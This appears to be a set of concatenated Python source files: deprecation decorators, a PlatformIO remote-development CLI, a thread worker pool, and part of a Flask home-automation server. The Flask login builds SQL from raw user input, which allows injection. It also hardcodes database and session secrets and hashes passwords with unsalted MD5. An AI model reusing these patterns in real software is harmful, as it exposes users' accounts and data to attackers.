if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called without arguments.
@param outer_args: args
@type outer_args: list
@param outer_kwargs: kwargs
@type outer_kwargs: dict
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = signature(obj)
# The decorator being decorated may have args, so both
# syntax need to be supported.
if (len(outer_args) == 1 and len(outer_kwargs) == 0 and
callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def issue_deprecation_warning(name, instead, depth, warning_class=None):
"""Issue a deprecation warning."""
if instead:
if warning_class is None:
warning_class = DeprecationWarning
warn(u'{0} is deprecated; use {1} instead.'.format(name, instead),
warning_class, depth + 1)
else:
if warning_class is None:
warning_class = _NotImplementedWarning
warn('{0} is deprecated.'.format(name), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: string
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@type args: list
@param kwargs: kwargs passed to the decorated function.
@type kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(name, instead, depth)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
without_parameters = len(args) == 1 and len(kwargs) == 0 and callable(args[0])
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
else:
return decorator
def deprecate_arg(old_arg, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg."""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""
Decorator to declare multiple args deprecated.
@param arg_pairs: Each entry points to the new argument name. With True or
None it drops the value and prints a warning. If False it just drops
the value.
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg in __kw:
if new_arg not in [True, False, None]:
if new_arg in __kw:
warn(u"%(new_arg)s argument of %(name)s "
u"replaces %(old_arg)s; cannot use both."
% output_args,
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn(u"%(old_arg)s argument of %(name)s "
u"is deprecated; use %(new_arg)s instead."
% output_args,
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
else:
if new_arg is False:
cls = PendingDeprecationWarning
else:
cls = DeprecationWarning
warn(u"%(old_arg)s argument of %(name)s is deprecated."
% output_args,
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
# __signature__ is only available in Python 3 which has OrderedDict
params = OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of ' + new_arg + ']'
if new_arg not in [True, False, None]
else NotImplemented)
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example a call with 3 parameters and the
original function requests one and arg_names contain one name will result
in an error, because the function got called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, _ = getargspec(wrapper.__wrapped__)
if varargs is not None and kwargs is not None:
raise ValueError('{0} may not have * or ** args.'.format(
name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args), len(__args) - len(arg_names))])
new_kwargs = dict((arg, val) for arg, val in __kw.items()
if arg not in arg_names)
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn(u"The trailing arguments ('{0}') of {1} are deprecated. "
u"The value(s) provided for '{2}' have been dropped.".
format("', '".join(arg_names),
name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
def redirect_func(target, source_module=None, target_module=None,
old_name=None, class_name=None):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.' defaults
to target_module. If 'None' (default) it tries to guess it from the
executing function.
@type source_module: basestring
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@type target_module: basestring
@param old_name: The old function name. If None it uses the name of the
new function.
@type old_name: basestring
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@type class_name: basestring
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(old_name, new_name, 2)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module is '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, basestring):
module = sys.modules[module]
super(ModuleDeprecationWrapper, self).__setattr__('_deprecated', {})
super(ModuleDeprecationWrapper, self).__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name, replacement=None,
replacement_name=None, warning_message=None):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@type name: str
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@type replacement_name: str
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@type warning_message: basestring
"""
if '.' in name:
raise ValueError('Deprecated name "{0}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{0}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{0}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
if replacement_name:
warning_message = '{0}.{1} is deprecated; use {2} instead.'
else:
warning_message = u"{0}.{1} is deprecated."
self._deprecated[name] = replacement_name, replacement, warning_message
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
warning_message = self._deprecated[attr][2]
warn(warning_message.format(self._module.__name__, attr,
self._deprecated[attr][0]),
DeprecationWarning, 2)
if self._deprecated[attr][1]:
return self._deprecated[attr][1]
elif '.' in self._deprecated[attr][0]:
try:
package_name = self._deprecated[attr][0].split('.', 1)[0]
module = __import__(package_name)
context = {package_name: module}
replacement = eval(self._deprecated[attr][0], context)
self._deprecated[attr] = (
self._deprecated[attr][0],
replacement,
self._deprecated[attr][2]
)
return replacement
except Exception:
pass
return getattr(self._module, attr)
@deprecated('open_archive()')
def open_compressed(filename, use_extension=False):
"""DEPRECATED: Open a file and uncompress it if needed."""
return open_archive(filename, use_extension=use_extension)
def file_mode_checker(filename, mode=0o600):
"""Check file mode and update it, if needed.
@param filename: filename path
@type filename: basestring
@param mode: requested file mode
@type mode: int
"""
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
st_mode = os.stat(filename).st_mode
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
def compute_file_hash(filename, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@type filename: basestring
@param func: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
function name shall be passed as string, e.g. 'sha1'.
@type filename: basestring
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
|
command.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=too-many-arguments, import-outside-toplevel
# pylint: disable=inconsistent-return-statements
import os
import subprocess
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import fs, proc
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.commands.run.command import cli as cmd_run
from platformio.commands.test.command import cli as cmd_test
from platformio.package.manager.core import inject_contrib_pysite
from platformio.project.exception import NotPlatformIOProjectError
@click.group("remote", short_help="Remote Development")
@click.option("-a", "--agent", multiple=True)
@click.pass_context
def cli(ctx, agent):
ctx.obj = agent
inject_contrib_pysite()
@cli.group("agent", short_help="Start a new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(name, share, working_dir):
from platformio.commands.remote.client.agent_service import RemoteAgentService
RemoteAgentService(name, share, working_dir).connect()
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
from platformio.commands.remote.client.agent_list import AgentListClient
AgentListClient().connect()
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
@click.pass_obj
def remote_update(agents, only_check, dry_run):
from platformio.commands.remote.client.update_core import UpdateCoreClient
UpdateCoreClient("update", agents, dict(only_check=only_check or dry_run)).connect()
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_run(
ctx,
agents,
environment,
target,
upload_port,
project_dir,
disable_auto_clean,
force_remote,
silent,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"run",
agents,
dict(
environment=environment,
target=target,
upload_port=upload_port,
project_dir=project_dir,
disable_auto_clean=disable_auto_clean,
force_remote=force_remote,
silent=silent,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
local_targets = []
if "clean" in target:
local_targets = ["clean"]
elif set(["buildfs", "uploadfs", "uploadfsota"]) & set(target):
local_targets = ["buildfs"]
else:
local_targets = ["checkprogsize", "buildprog"]
ctx.invoke(
cmd_run,
environment=environment,
target=local_targets,
project_dir=project_dir,
# disable_auto_clean=True,
silent=silent,
verbose=verbose,
)
if any(["upload" in t for t in target] + ["program" in target]):
click.secho("Uploading firmware remotely", bold=True)
cr.options["target"] += ("nobuild",)
cr.options["disable_auto_clean"] = True
cr.connect()
return True
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
@click.pass_obj
@click.pass_context
def remote_test(
ctx,
agents,
environment,
ignore,
upload_port,
test_port,
project_dir,
force_remote,
without_building,
without_uploading,
verbose,
):
from platformio.commands.remote.client.run_or_test import RunOrTestClient
cr = RunOrTestClient(
"test",
agents,
dict(
environment=environment,
ignore=ignore,
upload_port=upload_port,
test_port=test_port,
project_dir=project_dir,
force_remote=force_remote,
without_building=without_building,
without_uploading=without_uploading,
verbose=verbose,
),
)
if force_remote:
return cr.connect()
click.secho("Building project locally", bold=True)
ctx.invoke(
cmd_test,
environment=environment,
ignore=ignore,
project_dir=project_dir,
without_uploading=True,
without_testing=True,
verbose=verbose,
)
click.secho("Testing project remotely", bold=True)
cr.options["without_building"] = True
cr.connect()
return True
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
@click.pass_obj
def device_list(agents, json_output):
from platformio.commands.remote.client.device_list import DeviceListClient
DeviceListClient(agents, json_output).connect()
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.option(
"--sock",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.pass_obj
@click.pass_context
def device_monitor(ctx, agents, **kwargs):
from platformio.commands.remote.client.device_monitor import DeviceMonitorClient
if kwargs["sock"]:
return DeviceMonitorClient(agents, **kwargs).connect()
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device_helpers.get_project_options(kwargs["environment"])
kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
subcmd_argv = ["remote"]
for agent in agents:
subcmd_argv.extend(["--agent", agent])
subcmd_argv.extend(["device", "monitor"])
subcmd_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
subcmd_argv.extend(["--sock", sock_dir])
subprocess.call([proc.where_is_program("platformio")] + subcmd_argv)
sock_dir = mkdtemp(suffix="pio")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
with open(sock_file, encoding="utf8") as fp:
kwargs["port"] = fp.read()
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
return True
|
worker.py
|
# vim: set ts=2 sw=2 tw=99 noet:
import threading
class Worker:
def __call__(self):
while len(self.jobs):
try:
job = self.jobs.pop()
job.run()
except KeyboardInterrupt as ki:
return
except Exception as e:
self.e = e
self.failedJob = job
class WorkerPool:
def __init__(self, numWorkers):
self.numWorkers = numWorkers
self.workers = []
for i in range(0, self.numWorkers):
self.workers.append(Worker())
def RunJobs(self, jobs):
for w in self.workers:
w.failedJob = None
w.e = None
w.jobs = []
w.thread = threading.Thread(target = w)
#Divvy up jobs
num = 0
for i in jobs:
self.workers[num].jobs.append(i)
num = num + 1
if num == self.numWorkers:
num = 0
#Start up each thread
for w in self.workers:
w.thread.start()
#Wait for threads to finish
failed = []
for w in self.workers:
w.thread.join()
if w.failedJob != None or w.e != None:
failed.append({'job': w.failedJob, 'e': w.e})
return failed
|
domotica_server.py
|
# -*- coding: utf-8 -*-
import serial
import time
from flask import request
from flask import jsonify
import os
from flaskext.mysql import MySQL
import subprocess
import hashlib
import pyglet
import time
import json as JSON
from subprocess import Popen, PIPE, STDOUT
import collections
import datetime
import locale
import thread,threading
from flask_cors import CORS, cross_origin
import sys
import signal
from picamera import PiCamera
from flask_session import Session
from sqlalchemy import create_engine
import sqlalchemy.pool as pool
#from espeak import espeak
from flask import Flask, render_template, session, redirect, url_for
app = Flask(__name__)
cors = CORS(app, resources={r"/*": {"origins": "*"}})
#mysql= MySQL()
alarm_state = 0
#app.config['MYSQL_DATABASE_USER'] = 'root'
#app.config['MYSQL_DATABASE_PASSWORD'] = '1238'
#app.config['MYSQL_DATABASE_DB'] = 'domo_home'
#app.config['MYSQL_DATABASE_HOST'] = 'localhost'
#mysql.init_app(app)
engine = create_engine('mysql+pymysql://root:mypass@localhost/domo_home?charset=utf8',pool_size=5, max_overflow=10)
global conn
#con= mysql.connect()
global mypool
global temperatura
app.secret_key = '987321654011'
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SECRET_KEY'] = '987321654011'
app.config.from_object(__name__)
Session(app)
reload(sys)
global ser
global th1
task_lights_on=False
task_lights_off=False
time_lights_on=""
time_lights_off=""
thread_on=True
global daemon_alarm_actived
appliance_task=0
temperatura="0";
try:
#ser = serial.Serial(port='/dev/ttyACM0', baudrate = 9600, parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=2)
ser = serial.Serial('/dev/ttyACM0',9600,timeout=2)
#serial.Serial(port='/dev/ttyACM0',parity=serial.PARITY_NONE,stopbits=serial.STOPBITS_ONE,bytesize=serial.EIGHTBITS,timeout=1)
except:
print "serial not connected"
camera = PiCamera()
#VISTAS
@app.route("/session")
def SessionControl():
if session.get('logged_in') != True:
print("if Session")
return redirect(url_for('login'))#redirect("http://localhost:5000/login", code=302)
@app.route("/")
def home():
#return render_template('dashboard.html')
if session.get('logged_in') == True:
print("is logged")
return redirect(url_for('dashboard'))
return render_template('login.html')
@app.route("/login")
def login_get():
print("login")
if session.get('logged_in') == True:
print("is logged")
return redirect(url_for('dashboard'))
return render_template('login.html')
@app.route("/login", methods=['POST'])
def login():
if session.get('logged_in') == True:
return redirect(url_for('dashboard'))
conn = engine.connect()
user=request.form['user']
password=request.form['pass']
h=hashlib.md5(password.encode())
# query="select * from user where user = '{user}' and password = '{password}'".format(user=user,password=h.hexdigest())
query="select * from user u inner join role r on u.role_id = r.id where u.status = {activo} and u.user = '{user}' and u.password = '{password}'".format(activo=1,user=user,password=h.hexdigest())
# query="select * from user u inner join role r on u.role_id = r.id where u.user = '{user}'".format(user=user) #and u.password = '{password}'".format(user=user,password=h.hexdigest())
result = conn.execute(query)
#data=cursor.fetchall()
userLogged = ""
userRole = ""
for row in result:
userLogged = row[1]
userRole = row[13]
msg = collections.OrderedDict()
conn.close()
print(result)
if userLogged!="":
session['logged_in'] = True
session['userLogged'] = userLogged
session['userRole'] = userRole #probar roles
msg['status'] = 1
msg['msg'] = 'Usuario ingresado correctamente.'
else:
msg['status'] = 0
msg['msg'] = 'Usuario o contraseña incorrecta, está inactivo, o no cuenta con los permisos. Contacte con el Administrador.'
res = JSON.dumps(msg)
return res
@app.route("/logout")
def logout():
session['logged_in'] = False
session.clear()
return redirect(url_for('login'))
@app.route("/dashboard")
def dashboard():
if session.get('logged_in') != True:
print("if Session")
print(session)
return redirect(url_for('login'))
areaList = getActiveAreas()
applianceList = getActiveAppliances()
temperaturejson = JSON.loads(getTemperatura())['temperature']
temperature = temperaturejson['value']
humidity = JSON.loads(getHumedad())['humidity']['value']
currentExpense = JSON.loads(getCurrentMonthExpense())
locale.setlocale(locale.LC_ALL, 'an_ES.UTF-8')
totalExpense = locale.format("%d", (currentExpense['totalExpense']), grouping=True)
print("TEMP"+temperature)
alarmStatus = getAlarmStatus()
return render_template('dashboard.html',areas=areaList,appliances=applianceList,currentExpense=totalExpense,alarmStatus=alarmStatus,temperature=temperature,humidity=humidity,userLogged=session.get('userLogged'))
def getActiveAreas():
conn = engine.connect()
#cursor= conn.cursor()
queryArea="select * from area where status = '{activo}'".format(activo=1)
area_list = []
print(len(area_list))
area_rows=conn.execute(queryArea)
#area_rows=cursor.fetchall()
for row in area_rows:
area = collections.OrderedDict()
area['id'] = row[0]
area['name'] = row[1]
area['quantity'] = row[2]
area['creation_date'] = str(row[3])
area['status'] = row[4 ]
area['house_id'] = row[5]
print()
area_list.append(area)
conn.close()
print(len(area_list))
if len(area_list) > 0 and area_list != None:
return area_list
else:
area_list.append("No hay elementos.")
return area_list
def getActiveAppliances():
conn = engine.connect()
queryAppliance="select * from appliance where status = '{activo}'".format(activo=1)
appliance_list = []
appliance_rows=conn.execute(queryAppliance)
#appliance_rows=cursor.fetchall()
for row in appliance_rows:
appliance = collections.OrderedDict()
appliance['id'] = row[0]
appliance['name'] = row[1]
appliance['power'] = row[2]
appliance['description'] = str(row[3])
appliance['fee'] = row[4 ]
appliance['status'] = row[5]
appliance_list.append(appliance)
conn.close()
if len(appliance_list) > 0 and appliance_list != None:
return appliance_list
else:
appliance_list.append("No hay elementos.")
return appliance_list
#======== User services ============
@app.route("/user_index")
def userIndex():
userRole = session.get('userRole')
userCodeRole = isRoleValid(userRole)
print(userRole)
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
conn = engine.connect()
query = "select * from user u inner join role r on r.id=u.role_id"
rows=conn.execute(query)
conn.close()
#rows = cursor.fetchall()
objects_list = []
for row in rows:
d = collections.OrderedDict()
d['id'] = row[0]
d['name'] = row[1]
d['lastname'] = row[2]
d['user'] = row[3]
d['mail'] = str(row[5]) #datetime.strftime("%Y-%m-%d %H:%M:%S")
#d['creation_date'] = row[6].strftime("%Y-%m-%d %H:%M:%S")
d['birthdate'] = str(row[6])
d['creationDate'] = str(row[7])
d['status'] = row[8]
d['phone'] = row[9]
#d['role_id'] = row[9]
#objects_list.append(d)
# role = collections.OrderedDict()
# role['id'] = 1
# role['name'] = "admin"
# d['role'] = role
d['roleName'] = row[12]
objects_list.append(d)
#print(objects_list)
#conn.close
#usr = {'name': 'gabi', 'lastname': 'cabrera' }
if rows != None:
return render_template('user_index.html',users=objects_list,userLogged=session.get('userLogged'))
else:
return render_template('user_index.html',"lista vacia")
@app.route("/sign_up")
def singUp():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
return render_template('sign_up.html',userLogged=session.get('userLogged'))
@app.route("/create_user", methods=['POST'])
def createUser():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
print("if Session")
print(session)
return redirect(url_for('login'))
name=request.form['name']
lastName=request.form['last-name']
user=request.form['user']
password=request.form['password']
passHash=hashlib.md5(password.encode())
convertedPass=passHash.hexdigest()
phone=request.form['phone']
email=request.form['email']
roleId=request.form['user-role']
birthDate=request.form['birthdate']
status=request.form['user-active-radio']
# birthDate="2016-01-01"
creationDate= time.strftime("%Y-%m-%d")
query="insert into user (name,lastname,user,password,mail,birth_date,creation_date,status,phone,role_id) values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
conn = engine.connect()
data= conn.execute(query,(name,lastName,user,convertedPass,email,birthDate,creationDate,status,phone,roleId))
#data=cursor.execute(query,("gabi","cabrera","gabi","123","fasdfa","2016-10-23","2016-01-02",1,"123456",1))
#conn.commit()
conn.close
msg = collections.OrderedDict()
if data !=None:
print("create user")
msg['status'] = 1
msg['msg'] = "user successful created"
else:
msg = collections.OrderedDict()
msg['status'] = 0
msg['msg'] = "error, user not created"
res = JSON.dumps(msg)
return res
@app.route("/user_edit", methods=['GET'])
def userEdit():
userRole = session.get('userRole')
userCodeRole = isRoleAdmin()
if session.get('logged_in') != True or userCodeRole == False:
